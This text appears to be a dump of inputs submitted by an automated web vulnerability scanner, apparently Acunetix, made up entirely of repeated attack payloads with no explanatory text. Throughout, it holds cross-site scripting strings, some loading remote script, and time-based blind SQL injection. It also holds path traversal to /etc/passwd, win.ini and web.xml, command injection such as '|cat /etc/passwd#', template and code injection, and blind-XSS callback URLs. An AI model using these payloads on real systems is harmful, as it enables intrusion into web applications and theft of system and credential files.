1<div style=width:expression(prompt(967383))>

1

1

WEB-INF\web.xml

`cat /etc/passwd`

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<iframe src='data:text/html

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100427+99071}

1

1

1

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n928356=v985628

1

1

1some_inexistent_file_with_long_name%00.jpg

1<body onload=prompt(958210)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(974379)>

1

)

1

"|"ld

-1)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(997802)>

testasp.vulnweb.com

1

/etc/passwd

-1))

1

1

1<img/src=">" onerror=alert(912253)>

1

'

^(#$!@#$)(()))******

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

aAt9KCz3'

1

1<ScRiPt%20>prompt(905572)</sCripT>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

1

1&lt

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

BP2fen80')

1

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hit051qvva19f.bxss.me/

rKDb2hvA'))

||cat /etc/passwd

\xf6<img acu onmouseover=prompt(902776) //\xf6>

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

1<input autofocus onfocus=prompt(946528)>

1

-1

&dir

<a href='http://www.acunetix.com'>website security</a>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

1

file:///etc/passwd

http://www.acunetix.tst

'&dir&'

-1)

1

[url=http://www.acunetix.com]website security[/url]

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1_kVElH <ScRiPt >prompt(987507)</ScRiPt>

"&dir&"

-1))

<!--

1

1

1'"()&%<ScRiPt >prompt(945446)</ScRiPt>

1

1

1

xWrfSVEl'

1

WEB-INF/web.xml

|dir

1

1

'"()&%<ScRiPt >prompt(932856)</ScRiPt>

1

1

0gT15VRH')

1

WEB-INF\web.xml

'|dir

1

1

7p7VCJbZ'))

1_902417

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

acu4363\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4363

1

acux5146\xc0\xbez1\xc0\xbcz2a\x90bcxuca5146

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(911920)</ScRiPt>

1<script>prompt(968406)</script>

1

1

response.write(9654561*9635254)

1

WEB-INF/web.xml

1<ScRiPt >prompt(932803)</ScRiPt>

1

1

'+response.write(9654561*9635254)+'

WEB-INF\web.xml

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915056></ScRiPt>

"+response.write(9654561*9635254)+"

1

1

&cat /etc/passwd&

1

1<ScRiPt >prompt(996545)</ScRiPt>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<video><source onerror="javascript:prompt(988602)">

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963281)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<div style=width:expression(prompt(959031))>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1<iframe src='data:text/html

-1

1

1

${99548+99839}

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<body onload=prompt(977574)>

1

1

1

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977726)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

-1))

1

)

1

1&n982508=v965665

1<img src=xyz OnErRor=prompt(934051)>

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

UXAP6Pr0'

1

1<img/src=">" onerror=alert(958407)>

1

1

!(()&&!|*|*|

bvKpMtuQ')

"|"ld

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

y9BNm5K1'))

1

1<ScRiPt%20>prompt(951115)</sCripT>

1

-1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1&lt

'"()

-1)

'

/etc/passwd

'

1

1

1

1

\xf6<img acu onmouseover=prompt(945103) //\xf6>

-1))

"

1

1

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitBi1elGDAkx.bxss.me/

1<input autofocus onfocus=prompt(970534)>

${@print(md5(acunetix_wvs_security_test))}

1

1

DECZ64o6'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

pPMYzA8C')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

[url=http://www.acunetix.com]website security[/url]

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

comments

q8UnwUBi'))

1

1

1

1_0GzwY <ScRiPt >prompt(976151)</ScRiPt>

1

comments

1

'&dir&'

'"

1

1

1'"()&%<ScRiPt >prompt(996682)</ScRiPt>

1

comments/.

"&dir&"

<!--

file:///etc/passwd

1

1

1

1

1

|dir

'"()&%<ScRiPt >prompt(932162)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'|dir

1

1

1

1_913455

1

WEB-INF/web.xml

1

"|dir

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2474\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2474

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux10795\xc0\xbez1\xc0\xbcz2a\x90bcxuca10795

1

1

1<ScRiPt >prompt(900782)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(923619)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(904294)</ScRiPt>

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938054></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9053116*9126881)

1

1

1<ScRiPt >prompt(905459)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9053116*9126881)+'

&cat /etc/passwd&

1

"+response.write(9053116*9126881)+"

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(924552)">

1

1

WEB-INF/web.xml

"&cat /etc/passwd&"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951499)"></g></svg>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

WEB-INF\web.xml

1<div style=width:expression(prompt(969599))>

SomeCustomInjectedHeader:injected_by_wvs

${99029+99652}

1

1

1

1<iframe src='data:text/html

1

1

`cat /etc/passwd`

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(934568)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1&n975356=v917447

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920521)>

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1<img src=xyz OnErRor=prompt(976234)>

!(()&&!|*|*|

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(952464)>

-1))

'

1

testasp.vulnweb.com

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

LFhAB6Rt'

1<ScRiPt%20>prompt(913901)</sCripT>

1

1

'

1

1

1

1&lt

/etc/passwd

1

kD5V5cSZ')

${@print(md5(acunetix_wvs_security_test))}

1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

yvIb0QHX'))

\xf6<img acu onmouseover=prompt(927263) //\xf6>

1

||cat /etc/passwd

http://hitVwqt5cheQA.bxss.me/

acunetix_wvs_invalid_filename

1

1

1<input autofocus onfocus=prompt(966582)>

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

&dir

comments

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

1

comments

http://www.acunetix.tst

1_CiISn <ScRiPt >prompt(956503)</ScRiPt>

1

'"

-1))

1

1

"&dir&"

comments/.

1

1

foxbhOb5'

file:///etc/passwd

<!--

1'"()&%<ScRiPt >prompt(974234)</ScRiPt>

1

|dir

1

1

1

1

RDvMHmnu')

'"()&%<ScRiPt >prompt(959874)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

oFRIlzLL'))

1

1

1

WEB-INF/web.xml

1

1_951985

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

acu8247\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8247

../../../../../../../../../../windows/win.ini.jpg

1

1

acux9252\xc0\xbez1\xc0\xbcz2a\x90bcxuca9252

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(958619)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(911864)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(974588)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?924645></ScRiPt>

response.write(9433178*9385516)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(920689)</ScRiPt>

1

1

'+response.write(9433178*9385516)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1

1<video><source onerror="javascript:prompt(926136)">

"+response.write(9433178*9385516)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922115)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

"&cat /etc/passwd&"

1

1

1

1<div style=width:expression(prompt(901406))>

1

cat /etc/passwd

1

WEB-INF\web.xml

1<iframe src='data:text/html

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(911563)>

${99154+99106}

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977561)>

1

1&n906636=v983669

1

1

-1

1some_inexistent_file_with_long_name%00.jpg

1<img src=xyz OnErRor=prompt(927180)>

)

'|'ld

../../../../../../../../../../etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1)

1

1<img/src=">" onerror=alert(942880)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

!(()&&!|*|*|

testasp.vulnweb.com

'"()

1

1<ScRiPt%20>prompt(922726)</sCripT>

-1))

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

1

JQDbg4ZI'

1&lt

1

'

'

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

bj87DCAw')

1

"

1

\xf6<img acu onmouseover=prompt(900208) //\xf6>

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

kRh7ifc1'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1<input autofocus onfocus=prompt(917880)>

1

1

-1

/etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

<a href='http://www.acunetix.com'>website security</a>

&dir

1

http://hitdlFQPJeXr7.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1))

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

acunetix_wvs_invalid_filename

'&dir&'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_PGAgl <ScRiPt >prompt(987643)</ScRiPt>

njqipRIn'

http://www.acunetix.tst

'"

"&dir&"

1

1'"()&%<ScRiPt >prompt(966559)</ScRiPt>

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

j4KYnxaP')

<!--

1

1

|dir

1

1

'"()&%<ScRiPt >prompt(950773)</ScRiPt>

comments

jawtUUxv'))

'|dir

1

1

1

1

1

comments/.

1_921842

file:///etc/passwd

1

"|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu1376\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1376

1

1

acux3481\xc0\xbez1\xc0\xbcz2a\x90bcxuca3481

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(987033)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(951769)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(970910)</ScRiPt>

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915195></ScRiPt>

1

1

1

1<ScRiPt >prompt(995572)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(944393)">

1

1

response.write(9602707*9107157)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963934)"></g></svg>

1

1

'+response.write(9602707*9107157)+'

1

1

1<div style=width:expression(prompt(909222))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"+response.write(9602707*9107157)+"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(963579)>

1

1

'&cat /etc/passwd&'

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

${99768+100474}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973498)>

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(971533)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

1

1

1&n963751=v922988

1<img/src=">" onerror=alert(957863)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1some_inexistent_file_with_long_name%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<ScRiPt%20>prompt(929249)</sCripT>

`cat /etc/passwd`

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

1

1&lt

^(#$!@#$)(()))******

-1

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(982765) //\xf6>

'"()

'

1

'|'ld

1

-1)

/etc/passwd

1

1<input autofocus onfocus=prompt(991553)>

1

1

"

-1))

"|"ld

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

0H0nwcJK'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitsr9ePS2jKL.bxss.me/

'

puuREPvV')

1

1

1

1

1

1_p3ld9 <ScRiPt >prompt(995638)</ScRiPt>

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

1

1

"

AK0BSo4m'))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

'"

1

1

||cat /etc/passwd

1

-1

1'"()&%<ScRiPt >prompt(946081)</ScRiPt>

comments

1

<!--

1

'"()&%<ScRiPt >prompt(949863)</ScRiPt>

&dir

1

1

-1)

comments/.

file:///etc/passwd

1

1

1_901742

/\../\../\../\../\../\../\../etc/passwd

1

-1))

1

'&dir&'

1

1

1

WEB-INF/web.xml

DqWkk9A6'

1

"&dir&"

1

WEB-INF\web.xml

F9fHGZAC')

|dir

1

1

YUHCALBL'))

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

acu2835\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2835

"|dir

1

../../../../../../../../../../boot.ini

1

1

acux2807\xc0\xbez1\xc0\xbcz2a\x90bcxuca2807

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(919061)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(903347)</script>

1

1

1<ScRiPt >prompt(915577)</ScRiPt>

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?937453></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

response.write(9232387*9476825)

1<ScRiPt >prompt(991285)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'+response.write(9232387*9476825)+'

1

1<video><source onerror="javascript:prompt(947361)">

1

"+response.write(9232387*9476825)+"

&cat /etc/passwd&

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(930818)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(907606))>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

1<body onload=prompt(979565)>

1

`cat /etc/passwd`

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

${99005+99577}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991102)>

1

1

1

|cat /etc/passwd#

1

-1

1

1&n915667=v960012

1<img src=xyz OnErRor=prompt(942382)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

)

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(964202)>

1

"|"ld

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1<ScRiPt%20>prompt(996323)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

p55um382'

'"()

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'

1&lt

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

izk0N4d0')

\xf6<img acu onmouseover=prompt(972029) //\xf6>

"

1

'

1

1<input autofocus onfocus=prompt(901696)>

1

1

/etc/passwd

1

"

1

1

joE0ocD5'))

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

-1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

&dir

1

1_cg44f <ScRiPt >prompt(923302)</ScRiPt>

1

-1)

1

acunetix_wvs_invalid_filename

http://hitPlZiUPtE6i.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'&dir&'

1

1

-1))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

"&dir&"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

ycidAa1q'

1

1

'"

http://www.acunetix.tst

|dir

1

comments

1

1

1

pdT8lrFX')

<!--

file:///etc/passwd

1'"()&%<ScRiPt >prompt(947303)</ScRiPt>

1

'|dir

comments/.

1

TP6Pc50u'))

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(973584)</ScRiPt>

1

1

"|dir

1

1_921992

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acu2249\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2249

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acux9856\xc0\xbez1\xc0\xbcz2a\x90bcxuca9856

1

1

1

1<ScRiPt >prompt(943491)</ScRiPt>

1

response.write(9006726*9503863)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

'+response.write(9006726*9503863)+'

1

1

1

1<script>prompt(932563)</script>

"+response.write(9006726*9503863)+"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

&cat /etc/passwd&

1<ScRiPt >prompt(980341)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'&cat /etc/passwd&'

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925757></ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<ScRiPt >prompt(948249)</ScRiPt>

1

WEB-INF/web.xml

cat /etc/passwd

1
